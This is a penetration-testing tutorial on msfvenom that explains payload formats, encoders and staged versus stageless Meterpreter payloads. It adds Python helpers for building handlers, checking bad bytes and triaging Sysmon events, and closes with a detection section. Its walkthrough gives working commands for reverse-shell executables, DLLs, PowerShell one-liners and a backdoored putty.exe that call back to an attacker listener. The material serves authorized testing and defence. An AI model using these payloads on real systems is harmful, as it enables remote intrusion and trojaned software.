Generating Payloads with msfvenom: Formats, Encoders, and Staged vs Stageless

Tools & Defense

Introduction

Disclaimer: This article is for education and authorized security testing only. Generate, deliver, and execute payloads exclusively against systems you own or are explicitly permitted to test under a written engagement. Unauthorized use is illegal in most jurisdictions.

msfvenom is the payload generation and encoding component of the Metasploit Framework. It merged the legacy msfpayload and msfencode tools into a single CLI. For penetration testers it is the fastest way to turn a payload definition into a deliverable artifact — an executable, a DLL, raw shellcode, a web shell, or a one-liner.

In this article you will learn how msfvenom assembles a payload, what the key flags (-p, -f, -e, -b, LHOST/LPORT) mean, and the critical operational distinction between staged and stageless payloads. We close with a Blue Team section because every technique described here leaves detectable artifacts.

How it works / Background

A msfvenom invocation has three logical parts:

  1. The payload (-p) — the code that runs on the target (e.g. a Meterpreter session, a reverse shell, exec of a command).
  2. The format (-f) — how that code is packaged (exe, dll, elf, raw, psh, c, python, hex).
  3. Optional transforms — encoders (-e), bad-character avoidance (-b), and iterations (-i) that reshape the bytes without changing behavior.

Staged vs stageless

This is the single most important concept and the most commonly misunderstood.

  • Staged payloads (note the / separating segments): windows/meterpreter/reverse_tcp. A tiny first-stage "stager" is delivered to the target. Its only job is to open a socket back to the handler and download the much larger second stage (the actual Meterpreter DLL) into memory. The artifact on disk is small.
  • Stageless (note the _ joining segments): windows/meterpreter_reverse_tcp. The entire payload is self-contained in the artifact. Nothing is pulled from the network after execution.

Trade-offs:

Property                                          Staged (/)                    Stageless (_)
On-disk size                                      Small                         Large
Network noise                                     Second-stage transfer         No stage transfer (C2 traffic only)
Reliability over flaky links                      Lower                         Higher
Needs exploit/multi/handler with matching PAYLOAD Yes (must match exactly)      Yes (must match exactly)
Detection surface                                 Stager + stage transfer       Single large blob

A frequent failure mode is starting a handler with windows/meterpreter/reverse_tcp (staged) for a stageless artifact, or vice versa: the stager protocol and the stageless connection are not interchangeable, so the connection arrives but the session never completes. The handler's PAYLOAD must name exactly the module passed to -p, including architecture (x64 vs x86), staging (/ vs _) and transport (reverse_tcp vs reverse_https).

Prerequisites / Lab setup

  • Kali Linux (or any host with the Metasploit Framework installed).
  • An isolated lab network. A Windows 10/11 VM and a Linux VM as targets.
  • msfconsole available for the listener side.

Confirm the install and list available options:

msfvenom --list payloads | grep meterpreter | head
msfvenom --list formats
msfvenom --list encoders

Attack walkthrough / PoC

1. A basic staged Windows executable

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.7 LPORT=4444 \
  -f exe -o shell_staged.exe

-p selects the staged x64 Meterpreter, LHOST/LPORT set the callback, -f exe packages a PE, and -o writes the file.

2. The matching handler

msfconsole -q -x "use exploit/multi/handler; \
  set PAYLOAD windows/x64/meterpreter/reverse_tcp; \
  set LHOST 10.10.14.7; set LPORT 4444; \
  set ExitOnSession false; run -j"

Note the PAYLOAD is identical to -p. For a stageless artifact you would generate windows/x64/meterpreter_reverse_tcp and set the handler PAYLOAD to the same _ form.

3. Stageless variant

msfvenom -p windows/x64/meterpreter_reverse_tcp \
  LHOST=10.10.14.7 LPORT=443 \
  -f exe -o shell_stageless.exe

Notice the file is substantially larger because the full Meterpreter is embedded.
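The staged/stageless naming rule and the handler-matching requirement from steps 1 to 3 can be enforced mechanically by deriving the msfvenom command and the handler resource script from one spec. The Python helper below is an added example, not code from the page or from the Metasploit project: it only emits the command line and a resource script for msfconsole -r and does not run either tool. The stage names in STAGES and the transport prefixes (reverse_, bind_, find_) follow Metasploit's payload naming convention; the list is assumed to cover the common payloads but is not exhaustive.

```python
"""Build a msfvenom command and its matching exploit/multi/handler resource
script from one spec, so the handler PAYLOAD can never drift from -p.

Added example: emits text only, never runs msfvenom or msfconsole.
"""
import re
import shlex
from dataclasses import dataclass

# Stage names used in Metasploit payload module names (assumed, common ones only)
STAGES = {"meterpreter", "shell", "vncinject", "dllinject", "powershell", "custom", "upexec"}
TRANSPORT = r"(?:reverse|bind|find)_[a-z0-9_]+"
STAGED_RE = re.compile(r"^" + TRANSPORT + r"$")                       # .../<stage>/reverse_tcp
STAGELESS_RE = re.compile(r"^(?P<stage>[a-z]+)_(?P<transport>" + TRANSPORT + r")$")  # .../<stage>_reverse_tcp


@dataclass(frozen=True)
class PayloadSpec:
    payload: str          # e.g. windows/x64/meterpreter/reverse_tcp
    lhost: str
    lport: int
    fmt: str = "exe"      # msfvenom -f value
    out: str = "payload.exe"


def split_name(name: str):
    """Return (prefix, stage, transport, kind) for a payload module name.

    staged:    windows/x64/meterpreter/reverse_tcp  -> stage '/' transport
    stageless: windows/x64/meterpreter_reverse_tcp  -> stage '_' transport
    single:    windows/exec, cmd/unix/reverse_bash   -> no separate stage at all
    """
    parts = name.strip("/").split("/")
    last = parts[-1]
    if len(parts) >= 2 and parts[-2] in STAGES and STAGED_RE.match(last):
        return "/".join(parts[:-2]), parts[-2], last, "staged"
    m = STAGELESS_RE.match(last)
    if m and m.group("stage") in STAGES:
        return "/".join(parts[:-1]), m.group("stage"), m.group("transport"), "stageless"
    return "/".join(parts[:-1]), None, last, "single"


def payload_kind(name: str) -> str:
    return split_name(name)[3]


def handler_matches(generated: str, handler_payload: str):
    """Exact name match is required; name the most common mismatch explicitly."""
    if generated == handler_payload:
        return True, "exact match"
    g, h = split_name(generated), split_name(handler_payload)
    if g[:3] == h[:3] and g[3] != h[3]:
        return False, f"staging mismatch: artifact is {g[3]}, handler is {h[3]}"
    return False, "different payload"


def msfvenom_argv(spec: PayloadSpec) -> list:
    """argv for the generation step (step 1 / step 3 on the page)."""
    return ["msfvenom", "-p", spec.payload, f"LHOST={spec.lhost}", f"LPORT={spec.lport}",
            "-f", spec.fmt, "-o", spec.out]


def handler_rc(spec: PayloadSpec) -> str:
    """Resource script for `msfconsole -q -r handler.rc` (step 2 on the page);
    PAYLOAD comes from the same spec as the msfvenom command."""
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {spec.payload}",
        f"set LHOST {spec.lhost}",
        f"set LPORT {spec.lport}",
        "set ExitOnSession false",
        "run -j",
        "",
    ])


if __name__ == "__main__":
    spec = PayloadSpec("windows/x64/meterpreter/reverse_tcp", "10.10.14.7", 4444, "exe", "shell_staged.exe")
    print(shlex.join(msfvenom_argv(spec)))
    print(handler_rc(spec))
    print(handler_matches(spec.payload, "windows/x64/meterpreter_reverse_tcp"))
```

Write the string from handler_rc() to a file and start the listener with msfconsole -q -r that file; because both outputs come from one PayloadSpec, the "wrong handler for the artifact" failure described above cannot happen by typo.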

4. Other formats

A Linux ELF reverse shell:

msfvenom -p linux/x64/shell_reverse_tcp \
  LHOST=10.10.14.7 LPORT=4444 \
  -f elf -o shell.elf

Raw shellcode as a C array for an injector or custom loader:

msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=10.10.14.7 LPORT=8443 \
  -f c -v shellcode

A PowerShell one-liner (psh-cmd emits a cmd.exe line that launches powershell.exe with the script passed as an -e/-EncodedCommand argument, ready for a macro or a command-injection point):

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.7 LPORT=4444 \
  -f psh-cmd -o payload.txt

A DLL for proxying / hijacking scenarios:

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.7 LPORT=4444 \
  -f dll -o evil.dll

5. Encoders and bad characters

Encoders were historically used for AV evasion, but modern AV/EDR products carry signatures for the classic x86/shikata_ga_nai decoder stub, so encoding alone no longer evades anything. Encoders remain genuinely useful for bad-character avoidance: keeping bytes such as \x00, \x0a and \x0d out of the payload when a vulnerable parser would truncate or mangle them, which is an exploit-development concern rather than an evasion one.

msfvenom -p windows/shell_reverse_tcp \
  LHOST=10.10.14.7 LPORT=4444 \
  -b '\x00\x0a\x0d' -e x86/shikata_ga_nai -i 3 \
  -f c

-b lists the bytes to avoid, -e picks the encoder, and -i 3 runs three iterations (each pass wraps the output in another decoder stub). If you pass -b without -e, msfvenom selects compatible encoders itself, tries them in rank order until the output contains none of the listed bytes, and aborts if none succeeds. For real-world evasion, prefer custom loaders, packers, or shellcode injection into a benign process; see Process Injection Techniques.
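msfvenom refuses to emit output it could not encode around the bad bytes, but the bytes you finally embed in an exploit often pass through copy-paste, a format conversion, or hand edits, so it is worth re-checking the artifact you actually ship. The Python checker below is an added example, not code from the page or from Metasploit: it pulls the bytes back out of -f c output (or reads a -f raw file) and reports every bad byte with its offset. The two C arrays at the bottom are constructed for the demo and are not real shellcode.

```python
"""Verify that msfvenom output really avoids the bytes excluded with -b.

Added example (not from the page or Metasploit). Post-processes either the
`-f c` text (a C array of \\xNN escapes) or a `-f raw` file.
"""
import re

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def hex_escapes_to_bytes(text: str) -> bytes:
    """Collect every \\xNN escape in `text`. Works for both the -b argument
    (e.g. '\\x00\\x0a\\x0d') and the string literals in -f c output."""
    return bytes(int(h, 16) for h in HEX_ESCAPE.findall(text))


def find_bad_bytes(blob: bytes, badchars: bytes) -> list:
    """(offset, value) for every byte of `blob` that appears in `badchars`."""
    return [(i, b) for i, b in enumerate(blob) if b in badchars]


def check_c_output(c_text: str, badchar_spec: str) -> dict:
    """Report on -f c output: total length, whether it is clean, and where it is not."""
    blob = hex_escapes_to_bytes(c_text)
    hits = find_bad_bytes(blob, hex_escapes_to_bytes(badchar_spec))
    return {"length": len(blob), "clean": not hits, "hits": hits}


def check_raw_file(path: str, badchar_spec: str) -> dict:
    """Same report for a file written with `-f raw -o <path>`."""
    with open(path, "rb") as fh:
        blob = fh.read()
    hits = find_bad_bytes(blob, hex_escapes_to_bytes(badchar_spec))
    return {"length": len(blob), "clean": not hits, "hits": hits}


# Constructed stand-ins for msfvenom -f c output (not real shellcode).
CLEAN_SAMPLE = r'unsigned char buf[] = ' + '\n' + r'"\xfc\x48\x83\xe4\xf0\xe8\xc0";'
DIRTY_SAMPLE = r'unsigned char buf[] = ' + '\n' + r'"\xfc\x48\x00\xe4\x0a\xe8";'
BADCHARS = r"\x00\x0a\x0d"   # exactly the string that was passed to -b

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN_SAMPLE), ("dirty", DIRTY_SAMPLE)):
        print(name, check_c_output(sample, BADCHARS))
```

Pipe real output in with msfvenom ... -f c | python3 check_badchars.py (adjusting the __main__ block to read stdin), or point check_raw_file() at a -f raw artifact; a non-empty hits list means the bytes at those offsets will break the target parser regardless of what msfvenom reported.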

6. Embedding into a legitimate template

You can backdoor an existing PE with -x (template) and -k (keep original functionality), though signatures for this are mature. The template and the payload must share an architecture, and the tools shipped under /usr/share/windows-binaries are 32-bit builds, so pair that template with the x86 Meterpreter rather than the x64 payload used above:

msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.7 LPORT=4444 \
  -x /usr/share/windows-binaries/putty.exe -k \
  -f exe -o putty_backdoored.exe

Diagram

Generating Payloads with msfvenom: Formats, Encoders, and Staged vs Stageless, diagram 1 (image not reproduced here). It shows the artifact running on the victim, then either a staged second-stage download or a self-contained stageless payload, followed by the established reverse session back to the attacker's handler.

Detection & Defense (Blue Team)

Defenders should treat msfvenom artifacts as a well-characterized, signature-rich threat class. ATT&CK maps these to T1059 (Command and Scripting Interpreter), T1055 (Process Injection), and T1071 (Application Layer Protocol for C2).

Network detection

  • The Meterpreter stager has a recognizable handshake. Suricata/Snort rulesets (e.g. Emerging Threats) flag reverse_tcp and reverse_https stage transfers. Watch for unexpected outbound TCP/443 or TCP/4444 from workstations.
  • Enforce egress filtering and a forward proxy. Stageless payloads survive better on restricted links, but they still need outbound C2: apply default-deny egress and inspect TLS where policy allows. Unless the operator supplies a certificate via HandlerSSLCert, a reverse_https handler presents an automatically generated self-signed certificate; JA3/JA3S fingerprinting and certificate anomaly detection catch many handlers.

Endpoint detection

  • Microsoft Defender, and virtually every commercial EDR, detect default msfvenom output and the shikata_ga_nai decoder stub on disk and in memory. AMSI inspects PowerShell payloads at runtime, catching psh/psh-cmd one-liners and -EncodedCommand delivery.
  • Enable AMSI, ASR rules (block executable content from email/USB, block process creations from Office macros), and WDAC/AppLocker so unsigned executables and DLLs cannot run.
  • Hunt for reflective DLL loading: RWX private memory in a process with no backing file on disk is a strong Meterpreter indicator. Sysmon Event ID 8 (CreateRemoteThread) and Event ID 10 (ProcessAccess with 0x1F0FFF/0x1FFFFF access) surface injection. See Sysmon Threat Hunting.

Logging and response

  • Enable PowerShell Script Block Logging (Event ID 4104) and command-line process auditing (Event ID 4688). Backdoored templates from -x still spawn anomalous child processes.
  • Establish network baselines so a host suddenly beaconing to a new external IP is anomalous regardless of payload format.
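The endpoint and logging indicators above (Sysmon Event ID 8 and Event ID 10 with full-access masks, and 4688 command lines carrying an -EncodedCommand argument) can be turned into triage logic. The Python below is an added example, not code from the page: the events are constructed dicts using the field names Sysmon and the Windows Security log expose (SourceImage, TargetImage, GrantedAccess, CommandLine); the paths, masks and encoded script are made up for the demo, and STAGER_MARKERS is a heuristic list of strings typical of decoded psh/psh-cmd output, not a signature set.

```python
"""Triage constructed Sysmon / Security events for the msfvenom-related
behaviours listed on the page. Added example, not code from the page."""
import base64
import re

# ProcessAccess masks the page singles out as full-control handles
FULL_ACCESS_MASKS = {0x1F0FFF, 0x1FFFFF}
# powershell -e / -ec / -enc / -EncodedCommand <base64>
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
# Heuristic markers seen in decoded msfvenom psh/psh-cmd scripts (assumed list)
STAGER_MARKERS = ("frombase64string", "gzipstream", "iex ", "iex(", "invoke-expression",
                  "net.webclient", "downloadstring", "virtualalloc")


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script behind -EncodedCommand, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="replace")
    except ValueError:
        return None


def triage(event: dict) -> list:
    """Findings for one event; an empty list means nothing notable."""
    findings = []
    eid = event["EventID"]
    src, dst = event.get("SourceImage"), event.get("TargetImage")
    if eid == 8 and src != dst:
        # CreateRemoteThread into another process: classic injection step
        findings.append(f"remote thread created: {src} -> {dst}")
    elif eid == 10 and src != dst and int(event["GrantedAccess"], 16) in FULL_ACCESS_MASKS:
        # Full-access handle to a foreign process precedes most injection
        findings.append(f"full-access process handle: {src} -> {dst} ({event['GrantedAccess']})")
    elif eid == 4688:
        script = decode_encoded_command(event.get("CommandLine", ""))
        if script is not None:
            hits = [mk for mk in STAGER_MARKERS if mk in script.lower()]
            findings.append(f"encoded PowerShell, stager markers: {hits}" if hits
                            else "encoded PowerShell (no known markers, review manually)")
    return findings


def triage_all(events: list) -> dict:
    """index -> findings, only for events that produced at least one finding."""
    return {i: triage(ev) for i, ev in enumerate(events) if triage(ev)}


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample events (paths and values invented for the demo).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Users\lab\Downloads\shell_staged.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1F0FFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 8, "SourceImage": r"C:\Users\lab\Downloads\shell_staged.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe"},
    {"EventID": 4688, "CommandLine": "powershell -nop -w hidden -e " + encode_command(
        "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('AAAA'));"
        "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream("
        "$s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();")},
    {"EventID": 4688, "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for idx, findings in triage_all(SAMPLE_EVENTS).items():
        print(idx, findings)
```

In production the same checks belong in your SIEM rule language with an allowlist for legitimate cross-process access (debuggers, AV engines, some management agents) in front of the Event ID 10 mask check; the point of the example is that every condition keys on behaviour (handle rights, remote threads, encoded launch) rather than on a file hash.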

The key defensive takeaway: encoders do not defeat modern defenses. Detection should focus on behavior (injection, anomalous egress, reflective loading) rather than static signatures alone.

Conclusion

msfvenom is deliberately simple: choose a payload, choose a format, optionally transform the bytes. The concepts that actually matter operationally are matching the handler PAYLOAD exactly and understanding the staged (/) versus stageless (_) trade-off between artifact size, network footprint, and reliability. Encoders are for bad-character avoidance, not evasion. For defenders, default msfvenom output is heavily signatured — the durable detections target runtime behavior, not file hashes.
